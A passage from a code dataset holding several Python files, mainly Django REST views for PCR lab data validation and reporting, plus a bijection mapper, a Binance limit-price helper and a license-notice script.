status=status, created_by=request.user, modified_by=request.user)\n task = generate_inhibition_report.delay(sample, report_file.id, request.user.username)\n monitor_task.delay(task.id, datetime.now().strftime('%Y-%m-%d_%H:%M:%S'), report_file.id)\n return JsonResponse({\"message\": \"Request for Inhibition Report received.\"}, status=200)\n\n # override the default DELETE method to prevent deletion of a SampleExtraction with any results data entered\n def destroy(self, request, *args, **kwargs):\n nonnull_pcrreplicates = PCRReplicate.objects.filter(\n sample_extraction=self.get_object().id).exclude(cq_value__isnull=True)\n if any(nonnull_pcrreplicates):\n message = \"A Sample Extraction may not be deleted if any related PCR Replicates have results data entered.\"\n raise APIException(message)\n return super(SampleExtractionViewSet, self).destroy(request, *args, **kwargs)\n\n\nclass PCRReplicateViewSet(HistoryViewSet):\n serializer_class = PCRReplicateSerializer\n\n def get_serializer(self, *args, **kwargs):\n if 'data' in kwargs:\n data = kwargs['data']\n\n # check if many is required\n if isinstance(data, list):\n kwargs['many'] = True\n\n return super(PCRReplicateViewSet, self).get_serializer(*args, **kwargs)\n\n def get_queryset(self):\n queryset = PCRReplicate.objects.all()\n id = self.request.query_params.get('id', None)\n if id is not None:\n if LIST_DELIMETER in id:\n id_list = id.split(',')\n queryset = queryset.filter(id__in=id_list)\n else:\n queryset = queryset.filter(id__exact=id)\n return queryset\n\n # override the default PATCH method to allow bulk processing\n def patch(self, request, pk=None):\n request_data = JSONParser().parse(request)\n # if there is no pk, assume this is a bulk request\n if not pk:\n is_valid = True\n response_data = []\n valid_data = []\n response_errors = []\n for item in request_data:\n # ensure the id field is present, otherwise nothing can be updated\n if not item.get('id'):\n is_valid = False\n response_errors.append({\"id\": \"This field is required.\"})\n else:\n rep_id = item.pop('id')\n rep = PCRReplicate.objects.filter(id=rep_id).first()\n if rep:\n new_invalid = item.get('invalid', None)\n if new_invalid is not None and new_invalid != rep.invalid:\n item['invalid_override'] = request.user.id\n rep.replicate_concentration = rep.calc_rep_conc()\n serializer = self.serializer_class(rep, data=item, partial=True)\n # if this item is valid, temporarily hold it until all items are proven valid, then save all\n # if even one item is invalid, none will be saved, and the user will be returned the error(s)\n if serializer.is_valid():\n valid_data.append(serializer)\n else:\n is_valid = False\n response_errors.append(serializer.errors)\n else:\n is_valid = False\n response_errors.append({\"pcrreplicate\": \"No PCRReplicate exists with this ID: \" + str(rep_id)})\n if is_valid:\n # now that all items are proven valid, save and return them to the user\n for item in valid_data:\n item.save()\n response_data.append(item.data)\n return JsonResponse(response_data, safe=False, status=200)\n else:\n return JsonResponse(response_errors, safe=False, status=400)\n # otherwise, if there is a pk, update the instance indicated by the pk\n else:\n rep = PCRReplicate.objects.filter(id=pk).first()\n if rep:\n new_invalid = request_data.get('invalid', None)\n if new_invalid is not None and new_invalid != rep.invalid:\n if request_data.get('invalid_override', None) is None:\n request_data['invalid_override'] = request.user.id\n serializer = self.serializer_class(rep, data=request_data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=200)\n else:\n return Response(serializer.errors, status=400)\n else:\n return JsonResponse({\"pcrreplicate\": \"No PCRReplicate exists with this ID: \" + str(pk)}, status=400)\n\n\nclass PCRReplicateBatchViewSet(HistoryViewSet):\n serializer_class = PCRReplicateBatchSerializer\n\n def isnumber(self, val):\n try:\n return True if float(val) == 0 else float(val)\n except ValueError:\n return False\n\n def err_obj(self, field, message, severity):\n return {\"field\": field, \"message\": message, \"severity\": severity}\n\n def validate_controls(self, field):\n synonym = \" ('cp')\" if 'cq_value' in field else \" ('concentration')\" if 'gc_reaction' in field else ''\n invalid_reason = None\n if field not in self.request.data:\n invalid_reason = self.err_obj(field, field + synonym + \" is missing\", 2)\n elif self.request.data[field] is not None:\n if not self.isnumber(self.request.data[field]):\n invalid_reason = self.err_obj(field, field + synonym + \" is not a number\", 1)\n elif self.request.data[field] > Decimal('0') and field not in ['pcr_pos_cq_value', 'pcr_pos_gc_reaction']:\n # eventually we will also validate pcr_pos_cq_value by testing if it is >0.5 cylces from expected\n invalid_reason = self.err_obj(field, field + synonym + \" is positive\", 1)\n return invalid_reason\n\n @action(methods=['post'], detail=False)\n def bulk_load_negatives(self, request):\n\n is_valid = True\n valid_data = []\n response_errors = []\n for item in request.data:\n item_validation_errors = []\n if 'extraction_batch' not in item:\n item_validation_errors.append(\"extraction_batch is required\")\n if 'target' not in item:\n item_validation_errors.append(\"target is required\")\n if 'replicate_number' not in item:\n item_validation_errors.append(\"replicate_number is required\")\n if 'pcr_pos_cq_value' not in item:\n item_validation_errors.append(\"pcr_pos_cq_value is required\")\n if len(item_validation_errors) > 0:\n is_valid = False\n response_errors.append(item_validation_errors)\n continue\n\n pcrreplicate_batch = PCRReplicateBatch.objects.filter(\n extraction_batch=item['extraction_batch'], target=item['target'],\n replicate_number=item['replicate_number']).first()\n\n if pcrreplicate_batch:\n if not is_valid:\n continue\n else:\n item.pop('extraction_batch')\n item.pop('target')\n item.pop('replicate_number')\n item['ext_neg_cq_value'] = 0\n item['ext_neg_gc_reaction'] = 0\n item['rt_neg_cq_value'] = 0\n item['rt_neg_gc_reaction'] = 0\n item['pcr_neg_cq_value'] = 0\n item['pcr_neg_gc_reaction'] = 0\n item['pcr_pos_gc_reaction'] = 0\n item['updated_pcrreplicates'] = []\n\n pcrreplicates = PCRReplicate.objects.filter(pcrreplicate_batch=pcrreplicate_batch.id)\n for rep in pcrreplicates:\n item['updated_pcrreplicates'].append(\n {\"sample\": rep.sample_extraction.sample.id, \"cq_value\": 0, \"gc_reaction\": 0})\n\n serializer = self.serializer_class(pcrreplicate_batch, data=item, partial=True)\n # if this item is valid, temporarily hold it until all items are proven valid, then save all\n # if even one item is invalid, none will be saved, and the user will be returned the error(s)\n if serializer.is_valid():\n valid_data.append(serializer)\n else:\n is_valid = False\n response_errors.append(serializer.errors)\n else:\n message = \"No PCR replicate batch was found with extraction batch of \" + str(item['extraction_batch'])\n message += \" and target of \" + str(item['target'])\n message += \" and replicate number of \" + str(item['replicate_number'])\n is_valid = False\n response_errors.append({\"pcrreplicatebatch\": message})\n\n if is_valid:\n # now that all items are proven valid, save and return them to the user\n response_data = []\n for item in valid_data:\n item.save()\n # recalc the child rep validity\n reps = PCRReplicate.objects.filter(pcrreplicate_batch=item.data['id'])\n for rep in reps:\n if rep.invalid_override is None:\n rep.invalid = rep.calc_invalid()\n rep.save()\n response_data.append(item.data)\n return JsonResponse(response_data, safe=False, status=200)\n else:\n return JsonResponse(response_errors, safe=False, status=400)\n\n @action(methods=['post'], detail=False)\n def validate(self, request):\n validation_errors = []\n if 'analysis_batch' not in request.data:\n validation_errors.append(\"analysis_batch is required\")\n if 'extraction_number' not in request.data:\n validation_errors.append(\"extraction_number is required\")\n if 'target' not in request.data:\n validation_errors.append(\"target is required\")\n if 'replicate_number' not in request.data:\n validation_errors.append(\"replicate_number is required\")\n if len(validation_errors) > 0:\n return Response(validation_errors)\n\n extraction_batch = ExtractionBatch.objects.filter(\n analysis_batch=request.data['analysis_batch'],\n extraction_number=request.data['extraction_number']\n ).first()\n\n if not extraction_batch:\n message = \"No extraction batch was found with analysis batch of \" + str(request.data['analysis_batch'])\n message += \" and extraction number of \" + str(request.data['extraction_number'])\n return Response({\"extraction_batch\": message})\n\n target = Target.objects.filter(id=request.data['target']).first()\n\n if not target:\n message = \"No target was found with ID of \" + str(request.data['target'])\n return Response({\"target\": message})\n\n pcrreplicate_batch = PCRReplicateBatch.objects.filter(\n extraction_batch=extraction_batch.id,\n target=target.id,\n replicate_number=request.data['replicate_number']\n ).first()\n\n if not pcrreplicate_batch:\n message = \"No PCR replicate batch was found with extraction batch of \" + str(extraction_batch.id)\n message += \" and target of \" + str(request.data['target'])\n message += \" and replicate number of \" + str(request.data['replicate_number'])\n return Response({\"pcrreplicate_batch\": message}, status=400)\n\n rna = True if target.nucleic_acid_type.name == 'RNA' else False\n\n # start building up the response object\n field_validations = {\n \"id\": pcrreplicate_batch.id,\n \"ext_neg_invalid\": False,\n \"rt_neg_invalid\": False,\n \"pcr_neg_invalid\": False,\n \"pcr_pos_invalid\": False\n }\n\n # populate the response object with the submitted control values and the control validations\n control_fields = ['ext_neg_cq_value', 'ext_neg_gc_reaction', 'rt_neg_cq_value', 'rt_neg_gc_reaction',\n 'pcr_neg_cq_value', 'pcr_neg_gc_reaction', 'pcr_pos_cq_value', 'pcr_pos_gc_reaction']\n control_validations = []\n for field in control_fields:\n field_validations[field] = request.data[field] if field in request.data else None\n # exclude RT fields if this is a DNA target\n if 'rt' not in field or rna:\n validation_error = self.validate_controls(field)\n if validation_error:\n control_validations.append(validation_error)\n if \"ext_neg\" in field:\n field_validations[\"ext_neg_invalid\"] = True\n elif \"rt_neg\" in field:\n field_validations[\"rt_neg_invalid\"] = True\n elif \"pcr_neg\" in field:\n field_validations[\"pcr_neg_invalid\"] = True\n elif \"pcr_pos\" in field:\n field_validations[\"pcr_pos_invalid\"] = True\n field_validations[\"validation_errors\"] = control_validations\n\n # check that pcrreplicates have been submitted\n if 'updated_pcrreplicates' not in request.data or not request.data['updated_pcrreplicates']:\n field_validations[\"updated_pcrreplicates\"] = [(\"updated_pcrreplicates is missing\", 2)]\n else:\n # validate pcrreplicates\n existing_pcrreplicates = PCRReplicate.objects.filter(\n pcrreplicate_batch=pcrreplicate_batch.id).order_by('sample_extraction__sample__id')\n all_pcrreplicates_validations = []\n updated_pcrreplicates = request.data.get('updated_pcrreplicates')\n updated_pcrreplicates_sample_ids = [rep['sample'] for rep in updated_pcrreplicates]\n\n for existing_rep in existing_pcrreplicates:\n sample_id = existing_rep.sample_extraction.sample.id\n rep_validations = []\n\n # attempt to find the matching updated rep\n try:\n rep_index = updated_pcrreplicates_sample_ids.index(sample_id)\n # pop the matching updated rep from its list so that we eventually end up with an empty list,\n # or a list of extraneous reps\n updated_rep = updated_pcrreplicates.pop(rep_index)\n # also remove the parallel sample ID so that the two lists continue to have matching indexes\n del updated_pcrreplicates_sample_ids[rep_index]\n\n # start building up the response object\n response_rep = {\"sample\": sample_id}\n\n rep_validations = []\n\n # check if this rep has already been uploaded\n if existing_rep.cq_value is not None:\n message = \"sample \" + str(sample_id) + \" has already been uploaded for this PCR replicate batch\"\n rep_validations.append(self.err_obj(\"cq_value\", message, 1))\n\n # validate cq_value\n # remember that null is an acceptable value\n if 'cq_value' not in updated_rep:\n rep_validations.append(self.err_obj(\"cq_value\", \"cq_value ('cp') is missing\", 2))\n else:\n rep_cq_value = updated_rep['cq_value']\n response_rep['cq_value'] = rep_cq_value\n if rep_cq_value is not None:\n if not self.isnumber(rep_cq_value):\n rep_validations.append(self.err_obj(\"cq_value\", \"cq_value ('cp') is not a number\", 1))\n elif rep_cq_value < Decimal('0'):\n rep_validations.append(self.err_obj(\"cq_value\", \"cq_value ('cp') is less than zero\", 2))\n\n # validate gc_reaction\n # remember that null is an acceptable value\n if 'gc_reaction' not in updated_rep:\n message = \"gc_reaction ('concentration') is missing\"\n rep_validations.append(self.err_obj(\"gc_reaction\", message, 2))\n else:\n rep_gc_reaction = updated_rep['gc_reaction']\n response_rep['gc_reaction'] = rep_gc_reaction\n if rep_gc_reaction is not None:\n if not self.isnumber(rep_gc_reaction):\n message = \"gc_reaction ('concentration') is not a number\"\n rep_validations.append(self.err_obj(\"gc_reaction\", message, 1))\n response_rep['gc_reaction_sci'] = ''\n elif rep_gc_reaction < Decimal('0'):\n message = \"gc_reaction ('concentration') is less than zero\"\n rep_validations.append(self.err_obj(\"gc_reaction\", message, 2))\n response_rep['gc_reaction_sci'] = get_sci_val(rep_gc_reaction)\n else:\n response_rep['gc_reaction_sci'] = get_sci_val(rep_gc_reaction)\n else:\n response_rep['gc_reaction'] = None\n response_rep['gc_reaction_sci'] = ''\n\n response_rep['validation_errors'] = rep_validations\n all_pcrreplicates_validations.append(response_rep)\n\n # no matching updated_rep was found\n except ValueError:\n # start building up the response object\n response_rep = {\"sample\": sample_id}\n\n message = \"sample \" + str(sample_id) + \" expected but not found in submission\"\n rep_validations.append(self.err_obj(\"sample\", message, 2))\n\n response_rep['validation_errors'] = rep_validations\n all_pcrreplicates_validations.append(response_rep)\n\n # now list out the other updated reps that were submitted but do not belong to this batch\n for extraneous_rep in updated_pcrreplicates:\n rep_validations = []\n sample_id = \"(No Sample ID)\"\n if 'sample' not in extraneous_rep or extraneous_rep['sample'] is None:\n validation_error = self.err_obj(\"sample\", \"sample is a required field\", 1)\n else:\n sample_id = str(extraneous_rep.get('sample'))\n message = \"sample \" + sample_id + \" is not in this PCR replicate batch\"\n validation_error = self.err_obj(\"sample\", message, 1)\n\n # start building up the response object\n response_rep = {\"sample\": sample_id}\n if 'cq_value' not in extraneous_rep:\n continue\n else:\n rep_cq_value = extraneous_rep['cq_value']\n response_rep['cq_value'] = rep_cq_value\n if 'gc_reaction' not in extraneous_rep:\n continue\n else:\n rep_gc_reaction = extraneous_rep['gc_reaction']\n response_rep['gc_reaction'] = rep_gc_reaction\n if not self.isnumber(rep_gc_reaction):\n response_rep['gc_reaction_sci'] = ''\n else:\n response_rep['gc_reaction_sci'] = get_sci_val(rep_gc_reaction)\n\n rep_validations.append(validation_error)\n response_rep['validation_errors'] = rep_validations\n all_pcrreplicates_validations.append(response_rep)\n\n field_validations[\"updated_pcrreplicates\"] = all_pcrreplicates_validations\n\n return JsonResponse(field_validations, safe=False, status=200)\n\n # override the default queryset to allow filtering by URL arguments\n def get_queryset(self):\n queryset = PCRReplicateBatch.objects.all()\n # if ID is in query, only search by ID and ignore other params\n batch = self.request.query_params.get('id', None)\n if batch is not None:\n queryset = queryset.filter(id__exact=batch)\n # else, search by other params (that don't include ID)\n else:\n analysis_batch = self.request.query_params.get('analysis_batch', None)\n extraction_number = self.request.query_params.get('extraction_number', None)\n if analysis_batch is not None and extraction_number is not None:\n queryset = queryset.filter(extraction_batch__analysis_batch__exact=analysis_batch,\n extraction_batch__extraction_number__exact=extraction_number)\n target = self.request.query_params.get('target', None)\n if target is not None:\n queryset = queryset.filter(target__exact=target)\n replicate_number = self.request.query_params.get('replicate_number', None)\n if replicate_number is not None:\n queryset = queryset.filter(replicate_number__exact=replicate_number)\n return queryset\n\n # override the default DELETE method to prevent deletion of a PCRReplicateBatch with any results data entered\n def destroy(self, request, *args, **kwargs):\n nonnull_pcrreplicates = PCRReplicate.objects.filter(\n pcrreplicate_batch=self.get_object().id).exclude(cq_value__isnull=True)\n if any(nonnull_pcrreplicates):\n message = \"A PCR Replicate Batch may not be deleted\"\n message += \" if any related PCR Replicates have results data entered.\"\n raise APIException(message)\n return super(PCRReplicateBatchViewSet, self).destroy(request, *args, **kwargs)\n\n\nclass StandardCurveViewSet(HistoryViewSet):\n queryset = StandardCurve.objects.all()\n serializer_class = StandardCurveSerializer\n\n\nclass InhibitionViewSet(HistoryViewSet):\n queryset = Inhibition.objects.all()\n serializer_class = InhibitionSerializer\n\n def get_serializer(self, *args, **kwargs):\n if 'data' in kwargs:\n data = kwargs['data']\n\n # check if many is required\n if isinstance(data, list):\n kwargs['many'] = True\n\n return super(InhibitionViewSet, self).get_serializer(*args, **kwargs)\n\n # override the default DELETE method to prevent deletion of an Inhibition with any results data entered\n def destroy(self, request, *args, **kwargs):\n nonnull_pcrreplicates_dna = PCRReplicate.objects.filter(\n sample_extraction__inhibition_dna=self.get_object().id).exclude(cq_value__isnull=True)\n nonnull_pcrreplicates_rna = PCRReplicate.objects.filter(\n sample_extraction__inhibition_rna=self.get_object().id).exclude(cq_value__isnull=True)\n nonnull_pcrreplicates = nonnull_pcrreplicates_dna.union(nonnull_pcrreplicates_rna).distinct()\n if any(nonnull_pcrreplicates):\n message = \"An Inhibition may not be deleted if any related PCR Replicates have results data entered.\"\n raise APIException(message)\n return super(InhibitionViewSet, self).destroy(request, *args, **kwargs)\n\n # override the default PATCH method to allow bulk processing\n def patch(self, request, pk=None):\n request_data = JSONParser().parse(request)\n # if there is no pk, assume this is a bulk request\n if not pk:\n is_valid = True\n response_data = []\n valid_data = []\n response_errors = []\n for item in request_data:\n # ensure the id field is present, otherwise nothing can be updated\n if not item.get('id'):\n is_valid = False\n response_errors.append({\"id\": \"This field is required.\"})\n else:\n inhib = item.pop('id')\n inhibition = Inhibition.objects.filter(id=inhib).first()\n if inhibition:\n serializer = self.serializer_class(inhibition, data=item, partial=True)\n # if this item is valid, temporarily hold it until all items are proven valid, then save all\n # if even one item is invalid, none will be saved, and the user will be returned the error(s)\n if serializer.is_valid():\n valid_data.append(serializer)\n else:\n is_valid = False\n response_errors.append(serializer.errors)\n else:\n is_valid = False\n response_errors.append({\"inhibition\": \"No Inhibition exists with this ID: \" + str(inhib)})\n if is_valid:\n # now that all items are proven valid, save and return them to the user\n for item in valid_data:\n item.save()\n response_data.append(item.data)\n return JsonResponse(response_data, safe=False, status=200)\n else:\n return JsonResponse(response_errors, safe=False, status=400)\n # otherwise, if there is a pk, update the instance indicated by the pk\n else:\n inhibition = Inhibition.objects.filter(id=pk).first()\n if inhibition:\n serializer = self.serializer_class(inhibition, data=request_data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=200)\n else:\n return Response(serializer.errors, status=400)\n else:\n return JsonResponse({\"inhibition\": \"No Inhibition exists with this ID: \" + str(pk)}, status=400)\n\n\nclass SampleInhibitionViewSet(HistoryViewSet):\n serializer_class = SampleInhibitionSerializer\n\n # override the default queryset to allow filtering by URL arguments\n # if sample ID is in query, only search by sample ID and ignore other params\n def get_queryset(self):\n queryset = Sample.objects.all()\n # filter by sample IDs, exact list\n sample = self.request.query_params.get('id', None)\n if sample is not None:\n sample_list = sample.split(',')\n queryset = queryset.filter(id__in=sample_list)\n # else, search by other params (that don't include sample ID)\n else:\n # filter by analysis batch ID, exact\n analysis_batch = self.request.query_params.get('analysis_batch', None)\n if analysis_batch is not None:\n queryset = queryset.filter(analysis_batches__in=analysis_batch)\n return queryset\n\n\nclass InhibitionCalculateDilutionFactorView(views.APIView):\n permission_classes = (permissions.IsAuthenticated,)\n\n def post(self, request):\n request_data = JSONParser().parse(request)\n ab = request_data.get('analysis_batch', None)\n en = request_data.get('extraction_number', None)\n na = request_data.get('nucleic_acid_type', None)\n eb = ExtractionBatch.objects.filter(analysis_batch=ab, extraction_number=en).first()\n if eb:\n serializer = InhibitionCalculateDilutionFactorSerializer(data=request_data)\n if serializer.is_valid():\n is_valid = True\n response_data = []\n response_errors = []\n pos = request_data.get('inh_pos_cq_value', None)\n inhibitions = request_data.get('inhibitions', None)\n for inhibition in inhibitions:\n cq = inhibition.get('cq_value', None)\n sample = inhibition.get('sample', None)\n inhib = Inhibition.objects.filter(sample=sample, extraction_batch=eb, nucleic_acid_type=na).first()\n if inhib:\n suggested_dilution_factor = None\n diff = abs(pos - cq)\n # If INH CONT Cq minus Sample Cq<2 cycles, then dilution factor = 1 (no dilution)\n # If INH CONT Cq minus Sample Cq>=2 cycles AND Sample Cq<36, then dilution factor = 5\n # If INH CONT Cq minus Sample Cq>2 cycles AND Sample Cq>36 or no Cq, then dilution factor = 10\n if not cq:\n suggested_dilution_factor = 10\n elif 0.0 <= diff < 2.0:\n suggested_dilution_factor = 1\n elif diff >= 2.0 and cq < 36.0:\n suggested_dilution_factor = 5\n elif diff > 2.0 and cq > 36.0:\n suggested_dilution_factor = 10\n new_data = {\"id\": inhib.id, \"sample\": sample, \"cq_value\": cq,\n \"suggested_dilution_factor\": suggested_dilution_factor,\n \"extraction_batch\": eb.id}\n response_data.append(new_data)\n else:\n is_valid = False\n message = \"No Inhibition exists with Sample ID: \" + str(sample)\n message += \", Extraction Batch ID: \" + str(eb) + \", Nucleic Acid Type ID: \" + str(na)\n response_errors.append({\"inhibition\": message})\n if is_valid:\n return JsonResponse(response_data, safe=False, status=200)\n else:\n return JsonResponse(response_errors, safe=False, status=400)\n return Response(serializer.errors, status=400)\n else:\n message = \"No Extraction Batch exists with Analysis Batch ID: \" + str(ab)\n message += \" and Extraction Number: \" + str(en)\n return JsonResponse({\"extraction_batch\": message}, status=400)\n\n\nclass TargetViewSet(HistoryViewSet):\n queryset = Target.objects.all()\n serializer_class = TargetSerializer\n\n\n######\n#\n# Misc\n#\n######\n\n\nclass FieldUnitViewSet(HistoryViewSet):\n queryset = FieldUnit.objects.all()\n serializer_class = FieldUnitSerializer\n\n\nclass NucleicAcidTypeViewSet(HistoryViewSet):\n queryset = NucleicAcidType.objects.all()\n serializer_class = NucleicAcidTypeSerializer\n\n\nclass RecordTypeViewSet(HistoryViewSet):\n queryset = RecordType.objects.all()\n serializer_class = RecordTypeSerializer\n\n\nclass OtherAnalysisViewSet(HistoryViewSet):\n queryset = OtherAnalysis.objects.all()\n serializer_class = OtherAnalysisSerializer\n\n\n######\n#\n# Users\n#\n######\n\n\nclass UserViewSet(HistoryViewSet):\n serializer_class = UserSerializer\n\n def get_queryset(self):\n # do not return the admin and public users\n queryset = User.objects.all().exclude(id__in=[1])\n # filter by username, exact\n username = self.request.query_params.get('username', None)\n if username is not None:\n queryset = queryset.filter(username__exact=username)\n return queryset\n\n\nclass AuthView(views.APIView):\n authentication_classes = (CustomBasicAuthentication,)\n serializer_class = UserSerializer\n\n def post(self, request):\n\n # remove all sessions to prevent CSRF missing error on subsequent basic auth requests\n if request.user:\n user_sessions = []\n all_sessions = Session.objects.filter(expire_date__gte=timezone.now())\n for session in all_sessions:\n if str(request.user.id) == session.get_decoded().get('_auth_user_id'):\n user_sessions.append(session.pk)\n Session.objects.filter(pk__in=user_sessions).delete()\n\n resp = Response(self.serializer_class(request.user).data)\n\n # attempt to remove CSRF and session cookies\n resp.delete_cookie('csrftoken')\n resp.delete_cookie('sessionid')\n\n return resp\n\n\n######\n#\n# Reports\n#\n######\n\n\nclass QualityControlReportView(views.APIView):\n permission_classes = (permissions.IsAuthenticated,)\n\n def post(self, request):\n request_data = JSONParser().parse(request)\n samples = request_data.get('samples', None)\n report_type = ReportType.objects.filter(id=4).first()\n status = Status.objects.filter(id=1).first()\n report_file = ReportFile.objects.create(\n report_type=report_type, status=status, created_by=request.user, modified_by=request.user)\n task = generate_quality_control_report.delay(samples, report_file.id, request.user.username)\n monitor_task.delay(task.id, datetime.now().strftime('%Y-%m-%d_%H:%M:%S'), report_file.id)\n return JsonResponse({\"message\": \"Request for Inhibition Report received.\"}, status=200)\n\n\nclass ControlsResultsReportView(views.APIView):\n permission_classes = (permissions.IsAuthenticated,)\n\n def post(self, request):\n request_data = JSONParser().parse(request)\n sample_ids = request_data.get('samples', None)\n target_ids = request_data.get('targets', None)\n report_type = ReportType.objects.filter(id=5).first()\n status = Status.objects.filter(id=1).first()\n report_file = ReportFile.objects.create(\n report_type=report_type, status=status, created_by=request.user, modified_by=request.user)\n task = generate_control_results_report.delay(sample_ids, target_ids, report_file.id, request.user.username)\n monitor_task.delay(task.id, datetime.now().strftime('%Y-%m-%d_%H:%M:%S'), report_file.id)\n return JsonResponse({\"message\": \"Request for Control Results Report received.\"}, status=200)\n\n\nclass ReportFileViewSet(viewsets.ReadOnlyModelViewSet):\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = ReportFileSerializer\n\n def get_queryset(self):\n queryset = ReportFile.objects.all()\n query_params = self.request.query_params\n # filter by report_type, exact list\n report_type = query_params.get('report_type', None)\n if report_type is not None:\n if LIST_DELIMETER in report_type:\n report_type_list = report_type.split(LIST_DELIMETER)\n queryset = queryset.filter(report_type__in=report_type_list)\n else:\n queryset = queryset.filter(report_type__exact=report_type)\n return queryset\n\n\nclass ReportTypeViewSet(viewsets.ModelViewSet):\n permission_classes = (permissions.IsAuthenticated,)\n queryset = ReportType.objects.all()\n serializer_class = ReportTypeSerializer\n\n\nclass StatusViewSet(viewsets.ModelViewSet):\n permission_classes = (permissions.IsAuthenticated,)\n queryset = Status.objects.all()\n serializer_class = StatusSerializer\n"} {"ext": "py", "sha": "1a2fbb3f9d4cbb78cfc718b436a869fb005a7f82", "content": "import typing\n\ndef format_exc(): pass"} {"ext": "py", "sha": "1a2fbdc42aa0037a08ad5b5a9976d8cf322a2c7d", "content": "\nclass AlreadyBoundException(Exception):\n \"\"\"Raised when either x or y has been bound with the other.\"\"\"\n\n def __init__(self, *args):\n Exception.__init__(self, 'Already Bound', *args)\n\n# Bijection Mapper\nclass BiMapper():\n def __init__(self):\n self.x2y = {}\n self.y2x = {}\n\n def bind(self, x, y):\n \"\"\"\n Raises\n ------\n AlreadyBoundException:\n Raises AlreadyBoundException if x and y have been already bound.\n \"\"\"\n \n if x in self.x2y or y in self.y2x:\n raise AlreadyBoundException()\n \n self.x2y[x] = y\n self.y2x[y] = x\n\n def unbind_x(self, x):\n if not x in self.x2y: return\n\n y = self.x2y.pop(x)\n self.y2x.pop(y)\n\n def unbind_y(self, y):\n if not y in self.y2x: return\n\n x = self.y2x.pop(y)\n self.x2y.pop(x)\n"} {"ext": "py", "sha": "1a2fbe136ea46d2b8933a72cc64d2ad3d78dd0e4", "content": "from decimal import Decimal\n\nfrom . import exchanges\nfrom .user import User\nfrom .utils import log\n\n# TODO this logic isn't scientific in any way, mostly a playground\n\n\ndef determine_limit_price(user: User, symbol: str, purchasing_currency: str) -> Decimal:\n # TODO this is binance-specific right now, refactor this out\n\n trading_pair = symbol + purchasing_currency\n\n client = user.binance_client()\n\n # order depth returns the lowest asks and the highest bids\n # increasing limits returns lower bids and higher asks\n # grab a long-ish order book to get some analytics on the order book\n\n order_book = client.get_order_book(symbol=trading_pair, limit=100)\n\n # price that binance reports is at the bottom of the order book\n # looks like they use the bottom of the ask stack to clear market orders (makes sense)\n # cannot determine if the orders in the book are market, limit, or other order types.\n # I wonder if other exchanges expose that sort of information?\n lowest_ask = order_book[\"asks\"][0][0]\n highest_bid = order_book[\"bids\"][0][0]\n\n ask_difference = Decimal(highest_bid) - Decimal(lowest_ask)\n\n # TODO can we inspect the low price and determine the volume that was traded at that price point?\n last_day_low = low_over_last_day(user, trading_pair)\n\n log.warn(\n \"price analytics\",\n symbol=trading_pair,\n ask_bid_difference=ask_difference,\n ask_bid_percentage_difference=ask_difference / Decimal(lowest_ask) * -100,\n last_day_low_difference=100 - (last_day_low / Decimal(lowest_ask) * 100),\n bid=highest_bid,\n ask=lowest_ask,\n last_day_low=last_day_low,\n reported_price=exchanges.binance_price_for_symbol(trading_pair),\n )\n\n # TODO calculate momentum, or low price over last 24hrs, to determine the ideal drop price\n # TODO pull percentage drop attempt from user model\n\n limit_price = min(Decimal(highest_bid), Decimal(lowest_ask) * Decimal(0.97))\n limit_price = min(last_day_low, limit_price)\n\n # TODO can we inspect the order book depth here? Or general liquidity for the market?\n # what else can we do to improve our purchase strategy?\n\n # TODO add option to use the midpoint, or some other position, of the order book instead of the lowest ask\n\n return limit_price\n\n\ndef low_over_last_day(user: User, trading_pair: str) -> Decimal:\n # import datetime\n\n # TODO coinbase option is below, but ran into some issues with it that I can't remember\n # candles = coinbase_public_client.get_product_historic_rates(\n # product_id=\"PAXG-USD\",\n # granularity=60*60,\n # start=(datetime.datetime.now() - datetime.timedelta(hours=24)).isoformat(),\n # stop=datetime.datetime.now().isoformat()\n # )\n # min([candle['low'] for candle in candles])\n # https://binance-docs.github.io/apidocs/spot/en/#kline-candlestick-data\n # the API just returns an ordered array, which is insane\n\n \"\"\"\n [\n 1499040000000, // Open time\n \"0.01634790\", // Open\n \"0.80000000\", // High\n \"0.01575800\", // Low\n \"0.01577100\", // Close\n \"148976.11427815\", // Volume\n 1499644799999, // Close time\n \"2434.19055334\", // Quote asset volume\n 308, // Number of trades\n \"1756.87402397\", // Taker buy base asset volume\n \"28.46694368\", // Taker buy quote asset volume\n \"17928899.62484339\" // Ignore.\n ]\n \"\"\"\n\n candles = user.binance_client().get_klines(symbol=trading_pair, interval=\"1h\")\n\n return Decimal(min([candle[3] for candle in candles]))\n"} {"ext": "py", "sha": "1a2fc15b74332b0e1ff63e13e6914abfc9334f42", "content": "# Copyright (c) 2017 The Verde Developers.\n# Distributed under the terms of the BSD 3-Clause License.\n# SPDX-License-Identifier: BSD-3-Clause\n#\n# This code is part of the Fatiando a Terra project (https://www.fatiando.org)\n#\n\"\"\"\nAdd license notice to every source file if not present\n\"\"\"\nimport sys\nfrom argparse import ArgumentParser\nfrom pathlib import Path\n\nfrom pathspec import PathSpec\n\nPROJECT = \"verde\"\nYEAR = \"2017\"\nNOTICE = f\"\"\"\n# Copyright (c) {YEAR} The {PROJECT.title()} Developers.\n# Distributed under the terms of the BSD 3-Clause License.\n# SPDX-License-Identifier: BSD-3-Clause\n#\n# This code is part of the Fatiando a Terra project (https://www.fatiando.org)\n#\n\"\"\".strip()\nCHECK_HELP = \"\"\"\nDon't write the files, just return the status. Return code 0 means\nnothing would change. Return code 1 means some files lacks the license notice.\n\"\"\"\n\n\ndef get_gitignore(root):\n \"\"\"\n Return a PathSpec matching gitignore content if present.\n\n This function is a modified version of the one present in Black\n (https://github.com/psf/black) available under MIT License.\n \"\"\"\n gitignore = root / \".gitignore\"\n lines = []\n if gitignore.is_file():\n with gitignore.open() as gi_file:\n lines = gi_file.readlines()\n return PathSpec.from_lines(\"gitwildmatch\", lines)\n\n\ndef main():\n \"\"\"\n Add license notice to every source file if not present or just check\n \"\"\"\n # Create option parser\n parser = ArgumentParser(\n description=\" Add license notice to every source file if not present.\"\n )\n parser.add_argument(\n \"--check\", action=\"store_true\", dest=\"check\", default=False, help=CHECK_HELP\n )\n args = parser.parse_args()\n\n gitignore = get_gitignore(Path(\".\"))\n\n python_files = [\n path\n for path in Path(\".\").glob(\"**/*.py\")\n if not str(path).startswith(\".\")\n if not gitignore.match_file(path)\n ]\n\n missing_notice_files = []\n for pyfile in python_files:\n code = pyfile.read_text()\n if not code.startswith(NOTICE):\n missing_notice_files.append(pyfile)\n\n if args.check:\n if missing_notice_files:\n 